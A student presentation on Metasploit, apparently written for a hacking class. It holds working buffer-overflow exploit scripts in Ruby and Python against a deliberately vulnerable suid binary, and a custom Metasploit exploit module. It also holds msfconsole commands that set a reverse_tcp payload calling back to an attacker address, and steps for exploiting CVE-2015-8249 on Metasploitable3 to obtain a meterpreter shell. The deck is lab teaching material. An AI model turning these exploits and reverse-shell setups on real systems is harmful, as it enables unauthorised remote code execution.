Deeply Studying Metasploit framework
===
---
# Metasploit framework
<div class=members>
Group 1<br>
1. B043040006 謝文仁 <br>
2. B043040020 張哲魁 <br>
3. B043040036 滕熙評 <br>
4. B043040043 朱晉廷 <br>
Advisor: 王智弘
</div>
---
# Agenda
- Write your own metasploit module
- Attack Metasploitable 3 - Windows Server 2008
- Backdoor on Android using metasploit
---
# Write your own metasploit module
---
# Abstract
Integrate a hand-written payload into the Metasploit Framework.
Using a buffer overflow as the example: plant our own vulnerable program on the victim, write the payload, and wrap it into a Metasploit module.
---
# Environment and tools
- Attacker:
  1. OS: macOS 10.13.6
  2. Metasploit: 5.0.25
- Victim:
  1. OS: Ubuntu 14.04
  2. gcc: 4.8.4
- Network:
  - Both hosts in the same subnet.
---
# Vulnerable Program
A buffer overflow program with TCP socket connection.
```c=1
char sp[1024];   /* global buffer that receives the shellcode (at 0x0804a080) */
```
```c=48
/* start vulnerable read, ret2shellcode */
printf("shellcode:");
read(cli_fd, sp, 1024);
printf("The shellcode recv is:%s\n", sp);
printf("overflow here:");
char buf[20];
// VULNERABLE PLACE!! Didn't restrict the range
read(cli_fd, buf, 0xffffffff);
/* ----- */
printf("the buf recv is:%s\n", buf);
/* end of vulnerable read */
```
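As an added example (not the original vuln.c), here is a bounded replacement for the second `read()`, plus a pipe-based check that an 84-byte input (the exploit's 80-byte pad and 4-byte address) is cut to 19 bytes; `read_bounded` and `demo_overlong_input` are names assumed here.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/types.h>

#define BUF_SIZE 20   /* same size as `char buf[20]` in vuln.c */

/* Hardened form of the second read() in vuln.c: the byte count handed to
 * read() comes from the destination's size, never from the client, and
 * the data is NUL-terminated before it ever reaches printf("%s").
 * Returns bytes stored, or -1 on error or a zero-sized buffer. */
ssize_t read_bounded(int fd, char *dst, size_t cap)
{
    if (cap == 0) return -1;
    ssize_t n = read(fd, dst, cap - 1);   /* vuln.c passed 0xffffffff here */
    if (n < 0) { dst[0] = '\0'; return -1; }
    dst[n] = '\0';
    return n;
}

/* Demo helper (assumed name): push `len` bytes of 'A' through a pipe,
 * standing in for the TCP client, and report how many bytes the bounded
 * read actually stored. The original read() would have copied all `len`
 * bytes into the 20-byte stack buffer. */
ssize_t demo_overlong_input(size_t len)
{
    int fds[2];
    char buf[BUF_SIZE];
    char *junk = malloc(len ? len : 1);       /* constructed input */
    if (junk == NULL) return -1;
    if (pipe(fds) != 0) { free(junk); return -1; }
    memset(junk, 'A', len);
    ssize_t written = write(fds[1], junk, len);
    close(fds[1]);
    free(junk);
    ssize_t n = (written == (ssize_t)len) ? read_bounded(fds[0], buf, sizeof buf) : -1;
    close(fds[0]);
    return n;
}

int main(void)
{
    /* 84 bytes = the exploit's 80-byte pad plus the 4-byte return address */
    printf("84 bytes sent, %zd stored\n", demo_overlong_input(84));   /* 19 */
    printf("5 bytes sent, %zd stored\n", demo_overlong_input(5));     /* 5 */
    return 0;
}
```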
----
## Disabled Protections
<p style="color:red" align="center">
Set suid to get root permission.
</p>
Compile with these flags.
```Makefile=
SRC=vuln.c
EXEC=vuln
CC=gcc
# 32-bit build, no stack canary, executable stack, debug symbols
CCFLAG=-g -m32 -fno-stack-protector -z execstack -o
all:
	${CC} ${CCFLAG} ${EXEC} ${SRC}
	sudo chown root ${EXEC}
	sudo chgrp root ${EXEC}
	sudo chmod +s ${EXEC}
clean:
	rm -f ${EXEC}
```
----
## Final Protections
<img src="https://i.imgur.com/FgWy3MN.png" align="center">
----
## Payload - 1
Return to the address of `char sp[1024]` (0x0804a080), where the shellcode was placed.
Ruby version:
```ruby=
require 'pwn'   # pwntools-ruby
context.arch = 'i386'
z = Sock.new '192.168.56.101', ARGV[0].to_i   # port given on the command line
shellcode = "\x6a\x66\x58\x6a\x01\x5b\x31\xf6 ... "
z.sendline shellcode              # first read() stores this in sp
address = 0x0804a080              # return address: &sp, where the shellcode lives
payload = "a"*80 + p32(address)   # 80 bytes of padding, then the saved EIP
z.write payload                   # consumed by the second, unbounded read()
z.interact
```
----
## Payload - 2
Python version:
```python=
from pwn import *
import sys

host, port = '192.168.56.101', int(sys.argv[1])
r = remote(host, port)
# shellcode generated by pwntools' shellcraft; first read() stores it in sp
r.sendline(asm(shellcraft.sh()))
address = 0x0804a080                # return address: &sp, where the shellcode lives
payload = b"a"*80 + p32(address)    # bytes, so it concatenates with p32() on Python 3
r.sendline(payload)                 # consumed by the second, unbounded read()
r.interactive()
```
---
# Exploit Result - victim
Shellcode: reverse TCP on port 1337.
The victim, bound to port 8888, opens a backdoor on port 1337.


----
## Exploit Result - attacker
The attacker connects successfully on port 1337 (victim IP = 192.168.56.101).


---
# Integrate to Metasploit
- Start writing my own Metasploit module!
- Official template: [Metasploit Github](https://github.com/rapid7/metasploit-framework/wiki/How-to-get-started-with-writing-an-exploit)
- Basically, just follow that template.
----
## Module functions 1
- There are a few key functions:
  - `initialize()`: where the metadata is placed.
    - The payload, return address, etc. can be set per platform/target.
    - All other related information goes here too (ex: License, Name, ...).
----
## Module functions 2
- `exploit()`: main function of the exploit.
  1. connect
  2. send payload
  3. handler
  4. disconnect
----
## Whole Module
```ruby=
##
# This module requires Metasploit
##
require 'msf/core'

class MetasploitModule < Msf::Exploit::Remote
  Rank = ManualRanking

  include Msf::Exploit::Remote::Tcp

  def initialize(info = {})
    super(update_info(info,
      'Name'        => 'hacker class ret2shellcode buffer overflow',
      'Description' => %q|
        This is a module for buffer overflow of a simple program vuln,
        only works on this binary, create for hacker class final project.
      |,
      'Author'      => 'haruna',
      'References'  =>
        [
          [ 'URL', 'https://github.com/scwuaptx/HITCON-Training' ],
        ],
      'Platform'    => 'linux',
      'Payload'     =>
        {
        },
      'Arch'        => [ARCH_X86],
      'Targets'     =>
        [
          [
            'Linux x86',
            {
              'Arch' => ARCH_X86,
              'Ret'  => 0x0804a080
            }
          ]
        ],
      'DefaultTarget' => 0
    ))
  end

  # Returns that the remote host is always vulnerable
  def check
    return Exploit::CheckCode::Vulnerable
  end

  def exploit
    connect
    print_status("Sending #{payload.encoded.length} byte payload...")
    # send shellcode
    print_status("Sending payload...:" + payload.encoded)
    p = payload.encoded
    sock.put(p)
    # Build the buffer for transmission, return to the shellcode place.
    buf  = "A" * 80                  # offset = 80 bytes
    buf += [ target.ret ].pack('V')  # pack('V') means 32-bit little endian
    print_status("Sending:" + buf)
    sock.put(buf)
    handler
    disconnect
  end
end
```
---
# Metasploit Result - victim
The victim is still bound to port 8888 ...

----
## Metasploit Result - attacker 1
Enter msfconsole and set up the options ...
My module is placed at `exploit/unix/bof1`.
| who? | IP | PORT | metasploit |
| ---- | -- | ---- | ------------- |
| Attacker | 192.168.56.1 | 12345 | LHOST / LPORT |
| Victim | 192.168.56.101 | 8888 | RHOST / RPORT |
----
## Metasploit Result - attacker 2
After setting the options ...
```
msf5 exploit(unix/bof1) > show info
Name: hacker class ret2shellcode buffer overflow
Module: exploit/unix/bof1
Platform: Linux
Arch: x86
Privileged: No
License: Metasploit Framework License (BSD)
Rank: Manual
Provided by:
haruna
Available targets:
Id Name
-- ----
0 Linux x86
Check supported:
Yes
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS 192.168.56.101 yes The target address range or CIDR identifier
RPORT 8888 yes The target port (TCP)
Payload information:
Description:
This is a module for buffer overflow of a simple program vuln, only
works on this binary, create for hacker class final project.
References:
https://github.com/scwuaptx/HITCON-Training
```
----
## Metasploit Result - attacker 3
Next, set the payload ...
We can generate the shellcode directly from a Metasploit payload; unlike a hand-written exploit, there is no need to search online or use another tool to produce it. (`msfvenom` would also work.)
----
## Metasploit Result - attacker 4
```shell=
set payload linux/x86/shell/reverse_tcp
```
```
msf5 exploit(unix/bof1) > set payload linux/x86/shell/reverse_tcp
payload => linux/x86/shell/reverse_tcp
msf5 exploit(unix/bof1) > show options
Module options (exploit/unix/bof1):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS 192.168.56.101 yes The target address range or CIDR identifier
RPORT 8888 yes The target port (TCP)
Payload options (linux/x86/shell/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST 192.168.56.1 yes The listen address (an interface may be specified)
LPORT 12345 yes The listen port
Exploit target:
Id Name
-- ----
0 Linux x86
```
----
## Metasploit Result - attacker 5
Finally, exploit!

---
# DEMO
---
# Reference
1. [HITCON Training](https://github.com/scwuaptx/HITCON-Training)
2. [Module Example](https://taishi8117.github.io/2016/07/24/bof-metasploit/)
3. [Shell codes](http://shell-storm.org/shellcode/)
4. [Metasploit Github Wiki](https://github.com/rapid7/metasploit-framework/wiki)
---
# Metasploitable3 - Windows Server 2008
---
# Abstract
Exploit on Metasploitable3 - Microsoft Windows Server 2008.
GitHub page: [Metasploitable 3](https://github.com/rapid7/metasploitable3)
---
# Metasploitable 3
A VM that comes in two flavours, Ubuntu 14.04 and Windows Server 2008; you choose which one to build.
It ships with a number of vulnerabilities to attack.
---
# Scan Vulnerabilities
Use `nmap` with `-sV` (service/version detection) and `-p-` to probe **ALL** 65535 TCP ports.
```
$ nmap -sV -p- 192.168.56.103
Starting Nmap 7.70 ( https://nmap.org ) at 2019-06-13 00:01 CST
Nmap scan report for 192.168.56.103
Host is up (0.0033s latency).
Not shown: 65516 filtered ports
PORT STATE SERVICE VERSION
21/tcp open ftp Microsoft ftpd
22/tcp open ssh OpenSSH 7.1 (protocol 2.0)
80/tcp open http Microsoft IIS httpd 7.5
1617/tcp open rmiregistry Java RMI
4848/tcp open ssl/http Oracle GlassFish 4.0 (Servlet 3.1; JSP 2.3; Java 1.8)
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
8020/tcp open http Apache httpd
8022/tcp open http Apache Tomcat/Coyote JSP engine 1.1
8027/tcp open unknown
8080/tcp open http Oracle GlassFish 4.0 (Servlet 3.1; JSP 2.3; Java 1.8)
8282/tcp open http Apache Tomcat/Coyote JSP engine 1.1
8383/tcp open ssl/http Apache httpd
8484/tcp open http Jetty winstone-2.8
8585/tcp open http Apache httpd 2.2.21 ((Win64) PHP/5.3.10 DAV/2)
9200/tcp open http Elasticsearch REST API 1.1.1 (name: Eric Williams; Lucene 4.7)
49153/tcp open msrpc Microsoft Windows RPC
49154/tcp open msrpc Microsoft Windows RPC
49179/tcp open rmiregistry Java RMI
49205/tcp open tcpwrapped
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 268.44 seconds
```
----
## Vulnerabilities 1
We can see that a lot of HTTP ports are open.
Try port 8020, an HTTP service.
<img src="https://i.imgur.com/G6dgyI6.png" width=70% height=70%>
----
## Vulnerabilities 2
- There's a "ManageEngine Desktop Central" version 9 on it.
- A tool for remote management of Windows desktops.
- Search whether this version is vulnerable or not.
----
## Vulnerabilities 3
- Lucky! Found CVE-2015-8249, [reference at the NIST page](https://nvd.nist.gov/vuln/detail/CVE-2015-8249)
- The flaw is in the `computerName` parameter of the `FileUploadServlet` class in version 9 of the software: it is not fully validated, which allows a path injection attack and lets an attacker execute code remotely.
----
## Vulnerabilities 4
- Below is the Rapid7 blog post, with a detailed payload write-up: [Blog](https://blog.rapid7.com/2015/12/14/r7-2015-22-manageengine-desktop-central-9-fileuploadservlet-connectionid-vulnerability-cve-2015-8249/)
- Metasploit already has a module for this vulnerability.
- `exploit/windows/http/manageengine_connectionid_write`
---
# Exploit on Metasploit 1
Parameter config (msfconsole's `set` takes one option per command):
```shell=
use exploit/windows/http/manageengine_connectionid_write
set payload windows/meterpreter/reverse_tcp
set RHOST 192.168.56.103
set RPORT 8020
set LHOST 192.168.56.1
set LPORT 4444
```
----
## Exploit on Metasploit 2
Full settings:
<img src="https://i.imgur.com/guRwESK.png" width=90% height=90%>
----
## Exploit on Metasploit 3
Exploit! We successfully got a meterpreter shell.

---
# Protections
Upgrade the version or apply the patch.
The exploit above no longer works from version 9, build 91093 onward.
If installing a new version, the current latest release is version 10.
---
# DEMO
<style>
.reveal h1{
text-align: center;
font-size: 75px;
margin:auto;
}
.reveal h2{
font-size: 70px;
}
.reveal .members{
text-align: center;
}
.reveal p{
text-align: justify;
}
.markdown-body h1{ text-align: center;}
.markdown-body h2{ text-align: left;}
</style>